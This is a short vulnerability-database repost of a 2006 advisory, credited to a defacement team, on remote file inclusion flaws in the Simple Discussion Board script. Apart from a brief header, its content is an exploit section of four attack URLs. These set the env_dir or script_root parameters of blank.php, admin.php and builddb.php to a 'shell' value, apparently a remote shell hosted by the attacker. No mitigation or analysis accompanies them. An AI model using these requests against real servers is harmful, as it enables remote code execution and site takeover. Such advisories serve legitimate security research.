Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14356
HistorySep 20, 2006 - 12:00 a.m.

Simple Discussion Board Multiple F.le Inclusion Vulnerability

2006-09-2000:00:00
vulners.com
9

Simple Discussion Board Multiple F.le Inclusion Vulnerability

credit: CeNGiZ-HaN
mail: [email protected]
team: www.system-defacers.org
Script: Simple Discussion Board (sdb)
Download Adress:http://prdownloads.sourceforge.net/sdb/sdb-0.1.0.tar.gz
class: Remote
Risk: High

Exploit:

http://[target]/[path]/blank.php?env_dir=shell
http://[target]/[path]/blank.php?script_root=shell
http://[target]/[path]/admin.php?env_dir=shell
http://[target]/[path]/builddb.php?env_dir=shell

GreeTz No One ;)